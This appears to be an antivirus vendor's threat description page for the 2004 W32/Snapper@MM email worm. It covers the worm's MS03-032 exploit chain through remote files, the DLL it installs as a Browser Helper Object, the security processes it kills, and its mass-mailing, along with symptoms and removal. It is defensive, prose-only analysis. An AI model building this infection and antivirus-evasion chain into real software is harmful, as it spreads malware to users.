Content

W32/Snapper@MM

Type
Virus
SubType
Internet Worm
Discovery Date
03/24/2004
Length
8,704 bytes (DLL)
Minimum DAT
4342 (03/24/2004)
Updated DAT
4398 (10/13/2004)
Minimum Engine
5.1.00
Description Added
03/25/2004
Description Modified
03/25/2004 3:18 PM (PT)
Risk Assessment
Corporate User
Low-Profiled
Home User
Low-Profiled

Tab Navigation

Characteristics

-- Update March 25th 2004 15:16 PST --
This threat has been deemed Low-Profiled due to media attention at the following site: http://www.eweek.com/article2/0,1759,1554603,00.asp
--

This detection is for a worm intended to spread to email addresses extracted from the Windows Address Book of the victim machine.

  • Akin to the propagation mechanism of W32/Bagle.q@MM , this worm does not spread as an email attachment. Instead, an apparently blank email message is sent. However, the HTML formatted message contains code to exploit a Microsoft vulnerability found in security bulletin MS03-032 ("Object Tag vulnerability"). If successful, a remote file is downloaded, BANNER.HTM.
  • BANNER.HTM contains scripting to download another remote file (HTMLHELP.CGI) to the victim machine.
  • This file is actually a HTML application which contains a script that drops and loads a Win32 DLL (IELOAD.DLL) on the victim machine. The script will drop the DLL to %WinDir%.

    Please Note : at the time of writing the HTMLHELP.CGI file is not available at the remote server, so this variant of the worm is unable to propagate.

When IELOAD.DLL is loaded on the victim machine, it installs as a Browser Helper Object (BHO) - uses a random CLSID number. It terminates the following processes if they are running:

  • NAVAPW32.EXE
  • CCAPP.EXE
  • OUTPOST.EXE
  • SPIDERML.EXE

The DLL contains its own SMTP engine to construct outgoing messages, which are sent to recipients extracted from the victim's Windows Address Book. The email messages contain HTML that load the BANNER.HTM file as described above. The email is constructed as follows:

From: (spoofed)
Subject: Re:
Message Body: (apparently blank)

Symptoms

Traffic to a remote server upon viewing the email message.

Existence of unexpected Registry keys indicating the BHO installation:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
    CurrentVersion\Explorer\Browser Helper Objects (random CLSID number)
  • HKEY_CLASSES_ROOT\CLSID\(random CLSID number)\
    InProcServer32 (Default) = IELOAD.DLL

Method of Infection

This worm spreads via emailing a message intended to exploit a Microsoft vulnerability in order to download other remote scripts that drop and run the worm on the victim machine. It does not spread via email attachment.

Please Note : at the time of writing the HTMLHELP.CGI file is not available at the remote server, so this variant of the worm is unable to propagate.

Removal

All Users:
Use specified engine and DAT files for detection.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the current engine and the specified DATs (or higher). Older engines may not be able to remove all registry keys created by this threat.

Additional Windows ME/XP removal considerations

Variants

Variants

    N/A

All Information

Overview -

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.

Characteristics

Characteristics -

-- Update March 25th 2004 15:16 PST --
This threat has been deemed Low-Profiled due to media attention at the following site: http://www.eweek.com/article2/0,1759,1554603,00.asp
--

This detection is for a worm intended to spread to email addresses extracted from the Windows Address Book of the victim machine.

  • Akin to the propagation mechanism of W32/Bagle.q@MM , this worm does not spread as an email attachment. Instead, an apparently blank email message is sent. However, the HTML formatted message contains code to exploit a Microsoft vulnerability found in security bulletin MS03-032 ("Object Tag vulnerability"). If successful, a remote file is downloaded, BANNER.HTM.
  • BANNER.HTM contains scripting to download another remote file (HTMLHELP.CGI) to the victim machine.
  • This file is actually a HTML application which contains a script that drops and loads a Win32 DLL (IELOAD.DLL) on the victim machine. The script will drop the DLL to %WinDir%.

    Please Note : at the time of writing the HTMLHELP.CGI file is not available at the remote server, so this variant of the worm is unable to propagate.

When IELOAD.DLL is loaded on the victim machine, it installs as a Browser Helper Object (BHO) - uses a random CLSID number. It terminates the following processes if they are running:

  • NAVAPW32.EXE
  • CCAPP.EXE
  • OUTPOST.EXE
  • SPIDERML.EXE

The DLL contains its own SMTP engine to construct outgoing messages, which are sent to recipients extracted from the victim's Windows Address Book. The email messages contain HTML that load the BANNER.HTM file as described above. The email is constructed as follows:

From: (spoofed)
Subject: Re:
Message Body: (apparently blank)

Symptoms

Symptoms -

Traffic to a remote server upon viewing the email message.

Existence of unexpected Registry keys indicating the BHO installation:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
    CurrentVersion\Explorer\Browser Helper Objects (random CLSID number)
  • HKEY_CLASSES_ROOT\CLSID\(random CLSID number)\
    InProcServer32 (Default) = IELOAD.DLL

Method of Infection

Method of Infection -

This worm spreads via emailing a message intended to exploit a Microsoft vulnerability in order to download other remote scripts that drop and run the worm on the victim machine. It does not spread via email attachment.

Please Note : at the time of writing the HTMLHELP.CGI file is not available at the remote server, so this variant of the worm is unable to propagate.

Removal -

Removal -

All Users:
Use specified engine and DAT files for detection.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the current engine and the specified DATs (or higher). Older engines may not be able to remove all registry keys created by this threat.

Additional Windows ME/XP removal considerations

Variants

Variants -

    N/A